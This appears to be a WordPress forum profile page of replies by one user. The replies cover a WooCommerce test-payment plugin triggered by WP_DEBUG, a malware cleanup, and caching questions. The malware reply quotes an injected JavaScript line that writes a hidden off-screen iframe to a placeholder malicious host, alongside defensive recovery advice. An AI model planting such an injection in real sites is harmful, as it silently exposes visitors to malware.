Ben
Forum Replies Created
-
Set WP_DEBUG to true and it will work for everyone.
Could this behaviour be changed or made note of in the plugin?
On the settings page for WC Order Test, it says:
Only admin users will see this option on the checkout page.For WP_DEBUG to trigger it also is unexpected behaviour that unfortunately caught me off guard while trying to diagnose an issue today. WP_DEBUG can sometimes be enabled on production sites in tandem with WP_DEBUG_LOG and WP_DEBUG_DISPLAY for silent logging of errors.
“100% off all orders while I troubleshoot an issue,” is certainly an interesting proposition! But having a specific debug constant for WC Order Test or some kind of ‘users who can use this’ control in admin would be fantastic… and save me some stress.
Would be happy to do up a pull request.EDIT: Well, this has actually been a worthwhile discovery. Turns out @wpfixit have seemingly copied Sean Barton of Tortoise IT‘s plugin and republished it without crediting him. Really not in the spirit of the GPL license that he released it under.
But what do you know, Sean’s original readme for the plugin said: “Adds a test payment gateway to WooCommerce available only to logged in administrators or when WP_DEBUG is enabled.”
I’m just going to modify Sean’s plugin and start using that instead. -_-
- This reply was modified 3 years, 9 months ago by Ben. Reason: New knowledge
Forum: Fixing WordPress
In reply to: virus on .js and .php: function Art_protection() {Your site has been infected with malware, same as mine was. You’ll probably also find a series of malicious .php files located on your server with base64 code.
If you look closely at the Javascript code, it’s creating a cookie on your browser to log visited websites, and it’s also creating an iframe, out of view of the browser window, that leads to a virus website:
document.write('<iframe src="https://malicioussubdomain.infectedwebsite.com/dodgyfile.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>');
The malicious code keeps reappearing every time you delete it because the hacker sets up a cron-job (automatic task) that replaces the code periodically, and changes the malware address located in the iframe. This code will appear in every Javascript file on your server.
You need to find the point of entry into your site. They could have exploited a number of things, poorly written or maliciously written plugins, themes or other CMS systems.
In my case, I stupidly had an old version of ‘Gallery-project’ installed on my server, which they accessed.
# Known exploit = [Fingerprint Match] [PHP POST Exploit]: '/home/benaball/public_html/gallery/modules/exif/lib/490c.php' # Script version check [OLD] [Gallery3 v3.0.6 < v3.0.9]: '/home/benaball/public_html/gallery/modules/gallery/helpers/gallery.php'
^ Malware scan from my webhost
What you should look into:
1- If you’re with a web host, get them to do a malicious file scan using their WHM, you can also run a scan with Sucuri: https://sitecheck.sucuri.net/2- Read up on Hardening WordPress, here: (WordPress Codex – Hardening WordPress) and here: (Big JS Problem Hack – WordPress Forums)
How I solved it (summary):
– I exported my posts using WordPress’s export function.
– Erased the server and reinstalled WordPress
– Secured the installation with techniques listed in the Hardening WordPress codex
– Secured my directories using .htaccess
– Installed a number of security plugins
– Imported my posts using WordPress’s import function.
– Only installed plugins and themes from trusted developers
– Cleared my cache on CloudFlare as it had saved old malicious versions of the Javascript on my site.Where about is the loop? I can’t see the loop anywhere in the index.
Yes, I’m running W3 Total Cache and Hyper Cache. Not a good combo?
The mobile version of the website doesn’t work on my iOS device anymore, after I did the update.
Unless it hasn’t been working for awhile, I only tried loading my page after installing the update.